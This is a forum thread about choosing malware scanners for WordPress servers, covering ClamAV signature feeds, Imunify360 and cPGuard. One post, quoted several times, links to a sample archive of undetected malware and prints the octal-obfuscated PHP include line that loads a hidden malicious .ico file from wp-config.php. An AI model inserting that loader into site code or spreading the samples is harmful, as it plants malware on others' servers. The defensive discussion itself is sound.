Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Register

Quick Links


Categories

In this Discussion

Anti-malware suggestion - Page 2
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

Anti-malware suggestion

2»

Comments

  • CyberCr33pCyberCr33p Member
    edited January 2023

    You can use these free signatures:

    https://cdn.rfxn.com/downloads/rfxn.ndb
    https://cdn.rfxn.com/downloads/rfxn.hdb

    https://urlhaus.abuse.ch/downloads/urlhaus.ndb

    https://sigs.interserver.net/interserver256.hdb
    https://sigs.interserver.net/interservertopline.db
    https://sigs.interserver.net/shell.ldb
    https://sigs.interserver.net/whitelist.fp

    And paid signatures from:

    https://malware.expert

    We also maintain an inhouse database where we add extra signatures when we find a malware that the previous databases don't find it.

    Thanked by 5badhon_raj sebkehl jazz1611 khalequzzaman air4x
  • yoursunnyyoursunny Member, IPv6 Advocate
    1. Delete WordPress.
    2. Cancel server.
    3. Convert to static site and host on Netlify.
    4. Use Shopify for E-commerce section, if you have one.
    5. Use Twitter for comments section, if you have one.
    Thanked by 1badhon_raj
  • xx00xxxx00xx Member

    https://github.com/rseichter/fangfrisch

    https://blog.frehi.be/2021/01/25/using-fangfrisch-to-improve-malware-e-mail-detection-with-clamav/

    Thanked by 1badhon_raj
  • kidrockkidrock Member

    @mohsengham said:

    @kidrock said:

    @mohsengham said:
    Install cPGuard and enjoy your secure and smooth server! It's scanner is so powerful. It cleaned a hacked website that Imunify360 was unable to. They offer a 30 days trial. Their support is also fast and helpful.

    https://www.opsshield.com/

    I have a bunch of plugins (one of them may have a backdoor malware, but not 100% sure) from a WordPress site. ClamAV did not detect anything. If it's possible for you to test them using either cPGuard or Immunify360, please let me know and I will provide you the plugins link.
    Or anybody else with cPGuard/Immunify360 would like to test?

    Sure. I will scan then using cpguard, imunify360 and bitninja

    Did you get a chance to scan? Any results?

  • timelapsetimelapse Member

    @badhon_raj said:

    @stoned said:

    If you want I can send you some sample files, which clamav and maldet both reports as clean.

    Please upload the files to a free file upload host and post a link. I should like to examine them. Thank you.

    here:
    https://mega.nz/file/dOAxgQra#TmMkBLQQxhHS2AIEq_HPUDsF_VZKMAH8cYh6SdTqsyA

    the .ico files are included in wp-config.php file or index.php file like this:
    @include ("\057var\057www\057htm\154/in\156owi\164y/w\160-in\143lud\145s/f\157nts\057.65\0631db\0649.i\143o");

    the .php files are scattered around in different folders.

    Please let me know what you think.

    Clamav now detects this.

    I am not impressed with Imunifyav. It does not scan inside archives and has no option for it. Very bad detection rate. Possibly just scans and looks for known malware paths. It does not detect any of your files.

    Thanked by 1badhon_raj
  • ItsAsylumItsAsylum Member

    @stoned said:

    @badhon_raj said: What are the best options to protect a server with a few wordpress sites from malwares?

    What kind of malware do you fear would make its way into your server?

    @FatGrizzly said: 12$ p/m is cheap imo.
    Or you can try IM AV+ which is half the price, 6$ p/m

    Before you do spend some cash, jot down what you have and assign a value to it. Inventory your data and assign tiers to the importance of data. Then once you know what you have, you can decide how much protection to assign something. Build a security model for your needs first.

    Find out what attack vectors are open for WordPress, which exploits it has currently, and the common ways in which WP sites get hacked and plug any holes you can find.

    You don't want to put a $10 lock on a $5 bike.

    To my mind, as much as I know webdev, malware are not what a WordPress site usually has to worry about.

    What would you imagine such a security software will do for WordPress? I'm curious to know.

    I remember a time when apl my wordpress sites were getting hit with this nasty malware that would redirect my site to some sketchy add riddled one. Those are the kind I fear.

  • MikePTMikePT Moderator, Patron Provider, Veteran
    edited February 2023

    @timelapse said:

    @badhon_raj said:

    @stoned said:

    If you want I can send you some sample files, which clamav and maldet both reports as clean.

    Please upload the files to a free file upload host and post a link. I should like to examine them. Thank you.

    here:
    https://mega.nz/file/dOAxgQra#TmMkBLQQxhHS2AIEq_HPUDsF_VZKMAH8cYh6SdTqsyA

    the .ico files are included in wp-config.php file or index.php file like this:
    @include ("\057var\057www\057htm\154/in\156owi\164y/w\160-in\143lud\145s/f\157nts\057.65\0631db\0649.i\143o");

    the .php files are scattered around in different folders.

    Please let me know what you think.

    Clamav now detects this.

    I am not impressed with Imunifyav. It does not scan inside archives and has no option for it. Very bad detection rate. Possibly just scans and looks for known malware paths. It does not detect any of your files.

    Hey there,

    Could you please send me a PM with your email so I can follow up on this?

    Disclaimer: I work for CloudLinux.

    Cheers!

  • timelapsetimelapse Member

    @MikePT said:

    @timelapse said:

    @badhon_raj said:

    @stoned said:

    If you want I can send you some sample files, which clamav and maldet both reports as clean.

    Please upload the files to a free file upload host and post a link. I should like to examine them. Thank you.

    here:
    https://mega.nz/file/dOAxgQra#TmMkBLQQxhHS2AIEq_HPUDsF_VZKMAH8cYh6SdTqsyA

    the .ico files are included in wp-config.php file or index.php file like this:
    @include ("\057var\057www\057htm\154/in\156owi\164y/w\160-in\143lud\145s/f\157nts\057.65\0631db\0649.i\143o");

    the .php files are scattered around in different folders.

    Please let me know what you think.

    Clamav now detects this.

    I am not impressed with Imunifyav. It does not scan inside archives and has no option for it. Very bad detection rate. Possibly just scans and looks for known malware paths. It does not detect any of your files.

    Hey there,

    Could you please send me a PM with your email so I can follow up on this?

    Disclaimer: I work for CloudLinux.

    Cheers!

    @badhon_raj is the person to contact

    His samples are in the mega link

    Thanked by 1MikePT
  • MikePTMikePT Moderator, Patron Provider, Veteran

    @timelapse said:

    @MikePT said:

    @timelapse said:

    @badhon_raj said:

    @stoned said:

    If you want I can send you some sample files, which clamav and maldet both reports as clean.

    Please upload the files to a free file upload host and post a link. I should like to examine them. Thank you.

    here:
    https://mega.nz/file/dOAxgQra#TmMkBLQQxhHS2AIEq_HPUDsF_VZKMAH8cYh6SdTqsyA

    the .ico files are included in wp-config.php file or index.php file like this:
    @include ("\057var\057www\057htm\154/in\156owi\164y/w\160-in\143lud\145s/f\157nts\057.65\0631db\0649.i\143o");

    the .php files are scattered around in different folders.

    Please let me know what you think.

    Clamav now detects this.

    I am not impressed with Imunifyav. It does not scan inside archives and has no option for it. Very bad detection rate. Possibly just scans and looks for known malware paths. It does not detect any of your files.

    Hey there,

    Could you please send me a PM with your email so I can follow up on this?

    Disclaimer: I work for CloudLinux.

    Cheers!

    @badhon_raj is the person to contact

    His samples are in the mega link

    Thank you!

  • HxxxHxxx Member
    edited February 2023

    @yoursunny said:
    1. Delete WordPress.
    2. Cancel server.
    3. Convert to static site and host on Netlify.
    4. Use Shopify for E-commerce section, if you have one.
    5. Use Twitter for comments section, if you have one.

    c'mon now, stop pushing your preferences to everyone.
    Not everyone runs simple operations like yours.
    Some people like to own their websites. With shopify you don't own it, you are basically paying SaaS forever and can't copy files elsewhere like you can do with WooCommerce, Magento, OpenCart.

    In regards to thread. Imunify360 is super good.
    Works like a champ protecting wordpress. Use that server side and in you have control over those wordpress, install wordfence free version. You are set.

  • timelapsetimelapse Member

    @MikePT said:

    @timelapse said:

    @MikePT said:

    @timelapse said:

    @badhon_raj said:

    @stoned said:

    If you want I can send you some sample files, which clamav and maldet both reports as clean.

    Please upload the files to a free file upload host and post a link. I should like to examine them. Thank you.

    here:
    https://mega.nz/file/dOAxgQra#TmMkBLQQxhHS2AIEq_HPUDsF_VZKMAH8cYh6SdTqsyA

    the .ico files are included in wp-config.php file or index.php file like this:
    @include ("\057var\057www\057htm\154/in\156owi\164y/w\160-in\143lud\145s/f\157nts\057.65\0631db\0649.i\143o");

    the .php files are scattered around in different folders.

    Please let me know what you think.

    Clamav now detects this.

    I am not impressed with Imunifyav. It does not scan inside archives and has no option for it. Very bad detection rate. Possibly just scans and looks for known malware paths. It does not detect any of your files.

    Hey there,

    Could you please send me a PM with your email so I can follow up on this?

    Disclaimer: I work for CloudLinux.

    Cheers!

    @badhon_raj is the person to contact

    His samples are in the mega link

    Thank you!

    I pm'd you. Thank you.

    Thanked by 1MikePT
  • FatGrizzlyFatGrizzly Member, Host Rep

    @Hxxx said:

    @yoursunny said:
    1. Delete WordPress.
    2. Cancel server.
    3. Convert to static site and host on Netlify.
    4. Use Shopify for E-commerce section, if you have one.
    5. Use Twitter for comments section, if you have one.

    c'mon now, stop pushing your preferences to everyone.
    Not everyone runs simple operations like yours.
    Some people like to own their websites. With shopify you don't own it, you are basically paying SaaS forever and can't copy files elsewhere like you can do with WooCommerce, Magento, OpenCart.

    In regards to thread. Imunify360 is super good.
    Works like a champ protecting wordpress. Use that server side and in you have control over those wordpress, install wordfence free version. You are set.

    you couldn't get yoursunny's sarcasm?

  • yoursunnyyoursunny Member, IPv6 Advocate

    @FatGrizzly said:
    you couldn't get yoursunny's sarcasm?

    He's your breakfast for tomorrow then.

    Thanked by 1FatGrizzly
  • HxxxHxxx Member

    :D baited.

Sign In or Register to comment.